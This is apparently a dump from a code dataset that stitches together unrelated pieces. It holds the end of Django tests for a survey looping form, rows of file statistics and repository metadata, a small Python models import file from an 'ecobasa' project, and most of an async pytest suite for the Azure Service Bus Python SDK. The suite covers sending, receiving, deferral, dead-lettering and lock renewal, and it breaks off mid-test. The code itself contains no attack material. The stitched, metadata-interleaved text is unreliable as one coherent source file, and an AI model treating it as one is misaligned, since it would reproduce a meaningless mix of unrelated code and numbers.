q4 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name())
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form_data = {
'loop_starter': q1.id,
'loop_ender': q4.pk,
'repeat_logic': LoopingForm.FIXED_COUNT,
}
form = LoopingForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('repeat count is required', form.errors.values()[0])
form_data['repeat_count'] = 5
form = LoopingForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertEquals(QuestionLoop.objects.count(), 1)
self.assertTrue(QuestionLoop.objects.filter(loop_starter=q1, loop_ender=q4).exists())
def test_loop_form_previous_question(self):
q1 = BatchQuestion.objects.create(qset=self.batch, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1,
identifier='test2', text='test2', answer_type=TextAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name())
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form_data = {
'loop_starter': q3.pk,
'loop_ender': q5.pk,
'repeat_logic': LoopingForm.PREVIOUS_ANSWER_COUNT,
}
form = LoopingForm(q3, data=form_data)
self.assertFalse(form.is_valid())
form_data['previous_numeric_values'] = q2.id
form = LoopingForm(q3, data=form_data)
self.assertFalse(form.is_valid()) # only numeric answers are allowed as previous questions
form_data['previous_numeric_values'] = q1.id
form = LoopingForm(q3, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertEquals(QuestionLoop.objects.filter(loop_starter=q3, loop_ender=q5).count(), 1)
self.assertTrue(QuestionLoop.objects.filter(loop_starter=q3, loop_ender=q5).exists())
| 58.080952
| 118
| 0.604944
| 2,656
| 24,394
| 5.311747
| 0.069277
| 0.095832
| 0.063864
| 0.061029
| 0.874894
| 0.860363
| 0.853133
| 0.843706
| 0.825347
| 0.810604
| 0
| 0.020192
| 0.289415
| 24,394
| 420
| 119
| 58.080952
| 0.7937
| 0.007461
| 0
| 0.728947
| 0
| 0
| 0.047403
| 0.001911
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.039474
| false
| 0
| 0.015789
| 0
| 0.060526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f440d654293f738ef8999d27ac29c4e965449b9
| 219
|
py
|
Python
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 18
|
2015-06-04T07:22:38.000Z
|
2019-08-22T07:47:25.000Z
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 49
|
2015-05-30T11:26:38.000Z
|
2022-03-11T23:17:36.000Z
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 6
|
2015-08-07T15:09:26.000Z
|
2017-07-22T21:25:48.000Z
|
# -*- coding: utf-8 -*-
from .caravan import * # noqa
from .slideshow import * # noqa
from .organiser import * # noqa
from .profile import * # noqa
from .reference import * # noqa
| 24.333333
| 32
| 0.657534
| 27
| 219
| 5.333333
| 0.407407
| 0.416667
| 0.486111
| 0.319444
| 0.458333
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0.005848
| 0.219178
| 219
| 8
| 33
| 27.375
| 0.836257
| 0.232877
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f8c42172cd62e5ceddbf2064332857a10f08bc4
| 41,705
|
py
|
Python
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
pjquirk/azure-sdk-for-python
|
cbf02ec4f177b96eae1dbbba87c34c2c93880150
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
pjquirk/azure-sdk-for-python
|
cbf02ec4f177b96eae1dbbba87c34c2c93880150
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
xiafu-msft/azure-sdk-for-python
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import asyncio
import logging
import sys
import os
import pytest
import time
from datetime import datetime, timedelta
from azure.servicebus.aio import (
ServiceBusClient,
QueueClient,
Message,
BatchMessage,
DeferredMessage,
AutoLockRenew)
from azure.servicebus.common.message import PeekMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
def get_logger(level):
azure_logger = logging.getLogger("azure")
if not azure_logger.handlers:
azure_logger.setLevel(level)
handler = logging.StreamHandler(stream=sys.stdout)
handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
azure_logger.addHandler(handler)
uamqp_logger = logging.getLogger("uamqp")
if not uamqp_logger.handlers:
uamqp_logger.setLevel(logging.INFO)
uamqp_logger.addHandler(handler)
return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
_logger.info("Receiving: {}".format(message))
_logger.debug("Time to live: {}".format(message.time_to_live))
_logger.debug("Sequence number: {}".format(message.sequence_number))
_logger.debug("Enqueue Sequence number: {}".format(message.enqueue_sequence_number))
_logger.debug("Partition ID: {}".format(message.partition_id))
_logger.debug("Partition Key: {}".format(message.partition_key))
_logger.debug("User Properties: {}".format(message.user_properties))
_logger.debug("Annotations: {}".format(message.annotations))
_logger.debug("Delivery count: {}".format(message.header.delivery_count))
try:
_logger.debug("Locked until: {}".format(message.locked_until))
_logger.debug("Lock Token: {}".format(message.lock_token))
except TypeError:
pass
_logger.debug("Enqueued time: {}".format(message.enqueued_time))
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_peeklock(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
queue_client.get_properties()
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
await sender.send(message)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test", idle_timeout=5)
receiver = queue_client.get_receiver(idle_timeout=5)
count = 0
async for message in receiver:
print_message(message)
count += 1
await message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
queue_client.get_properties()
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
await sender.send(message)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
async for message in receiver:
messages.append(message)
with pytest.raises(MessageAlreadySettled):
await message.complete()
assert not receiver.running
assert len(messages) == 10
time.sleep(30)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
async for message in receiver:
messages.append(message)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_with_stop(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Stop message no. {}".format(i))
await sender.send(message)
messages = []
receiver = queue_client.get_receiver(idle_timeout=5)
async for message in receiver:
messages.append(message)
await message.complete()
if len(messages) >= 5:
break
assert receiver.running
assert len(messages) == 5
async with receiver:
async for message in receiver:
messages.append(message)
await message.complete()
if len(messages) >= 5:
break
assert not receiver.running
assert len(messages) == 6
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_simple(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Iter message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
print_message(message)
await message.complete()
with pytest.raises(MessageAlreadySettled):
await message.complete()
with pytest.raises(MessageAlreadySettled):
await message.renew_lock()
count += 1
with pytest.raises(InvalidHandlerState):
await receiver.__anext__()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(live_servicebus_config, standard_queue):
client = ServiceBusClient.from_connection_string(live_servicebus_config['conn_str'], debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Abandoned message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
print_message(message)
if not message.header.delivery_count:
count += 1
await message.abandon()
else:
assert message.header.delivery_count == 1
await message.complete()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_defer(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
deferred = await queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(ValueError):
await message.complete()
with pytest.raises(ValueError):
await queue_client.settle_deferred_messages('foo', deferred)
await queue_client.settle_deferred_messages('completed', deferred)
with pytest.raises(ServiceBusError):
await queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as session:
deferred = await session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
assert message.lock_token
assert message.locked_until
assert message._receiver
await message.renew_lock()
await message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as session:
deferred = await session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
await message.dead_letter("something")
count = 0
async with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
async for message in receiver:
count += 1
print_message(message)
assert message.user_properties[b'DeadLetterReason'] == b'something'
assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
await message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
count = 0
receiver = queue_client.get_receiver(idle_timeout=5)
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as receiver:
deferred = await receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(MessageAlreadySettled):
await message.complete()
with pytest.raises(ServiceBusError):
deferred = await receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(3):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 3
with pytest.raises(ServiceBusError):
deferred = await queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)
with pytest.raises(ServiceBusError):
deferred = await queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_receive_batch_with_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
await sender.send(message)
count = 0
messages = await receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
count += 1
await message.dead_letter(description="Testing")
messages = await receiver.fetch_next()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
await sender.send(message)
count = 0
messages = await receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
await message.dead_letter(description="Testing queue deadletter")
count += 1
messages = await receiver.fetch_next()
with pytest.raises(InvalidHandlerState):
await receiver.fetch_next()
assert count == 10
async with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_session_fail(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test")
async with queue_client.get_sender(session="test") as sender:
await sender.send(Message("test session sender"))
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_messages_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages = await queue_client.peek(5)
assert len(messages) == 5
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_messages_with_receiver(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages = await receiver.peek(5)
assert len(messages) > 0
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_empty_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
messages = await receiver.peek(10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_renew_message_locks(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
messages = []
locks = 3
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(locks):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages.extend(await receiver.fetch_next())
recv = True
while recv:
recv = await receiver.fetch_next()
messages.extend(recv)
try:
assert not message.expired
for m in messages:
time.sleep(5)
initial_expiry = m.locked_until
await m.renew_lock()
assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
finally:
await messages[0].complete()
await messages[1].complete()
time.sleep(30)
with pytest.raises(MessageLockExpired):
await messages[2].complete()
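# AutoLockRenew keeps a registered message's PeekLock alive in the background until the given timeout.
# A minimal usage sketch, mirroring the calls exercised in the test below (exact behaviour depends on this SDK version):
#     renewer = AutoLockRenew()
#     renewer.register(message, timeout=60)   # renew the lock for up to 60 seconds
#     ...                                     # process the message
#     await renewer.shutdown()                # stop the background renewal
# Once the timeout elapses the lock is allowed to expire, so settling the message raises
# MessageLockExpired with AutoLockRenewTimeout as its inner exception.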
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("{}".format(i))
await sender.send(message)
renewer = AutoLockRenew()
messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async for message in receiver:
if not messages:
messages.append(message)
assert not message.expired
renewer.register(message, timeout=60)
print("Registered lock renew thread", message.locked_until, datetime.now())
await asyncio.sleep(50)
print("Finished first sleep", message.locked_until)
assert not message.expired
await asyncio.sleep(25)
print("Finished second sleep", message.locked_until, datetime.now())
assert message.expired
try:
await message.complete()
raise AssertionError("Didn't raise MessageLockExpired")
except MessageLockExpired as e:
assert isinstance(e.inner_exception, AutoLockRenewTimeout)
else:
if message.expired:
print("Remaining messages", message.locked_until, datetime.now())
assert message.expired
with pytest.raises(MessageLockExpired):
await message.complete()
else:
assert message.header.delivery_count >= 1
print("Remaining messages", message.locked_until, datetime.now())
messages.append(message)
await message.complete()
await renewer.shutdown()
assert len(messages) == 11
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_fail_send_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
try:
queue_client = client.get_queue(standard_queue)
except MessageSendFailed:
pytest.skip("Open issue for uAMQP on OSX")
too_large = "A" * 1024 * 512
results = await queue_client.send(Message(too_large))
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
async with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
await sender.send(Message(too_large))
async with queue_client.get_sender() as sender:
sender.queue_message(Message(too_large))
results = await sender.send_pending_messages()
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_fail_send_batch_messages(live_servicebus_config, standard_queue):
pytest.skip("TODO: Pending bugfix in uAMQP")
def batch_data():
for i in range(3):
yield str(i) * 1024 * 256
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
results = await queue_client.send(BatchMessage(batch_data()))
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
async with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
await sender.send(BatchMessage(batch_data()))
async with queue_client.get_sender() as sender:
sender.queue_message(BatchMessage(batch_data()))
results = await sender.send_pending_messages()
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_time_to_live(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.time_to_live = timedelta(seconds=30)
await sender.send(message)
time.sleep(30)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert not messages
async with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 1
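# Duplicate detection: five sends share a single message_id on a duplicate-detection-enabled queue,
# so only one copy is expected to be enqueued and received.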
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_duplicate_detection(live_servicebus_config, duplicate_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
message_id = uuid.uuid4()
queue_client = client.get_queue(duplicate_queue)
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message(str(i))
message.properties.message_id = message_id
await sender.send(message)
async with queue_client.get_receiver(idle_timeout=5) as receiver:
count = 0
async for message in receiver:
print_message(message)
assert message.properties.message_id == message_id
await message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_connection_closed(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
with pytest.raises(MessageSettleFailed):
await messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_expiry(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(30)
assert messages[0].expired
with pytest.raises(MessageLockExpired):
await messages[0].complete()
with pytest.raises(MessageLockExpired):
await messages[0].renew_lock()
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=30)
assert len(messages) == 1
print_message(messages[0])
assert messages[0].header.delivery_count > 0
await messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_lock_renew(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
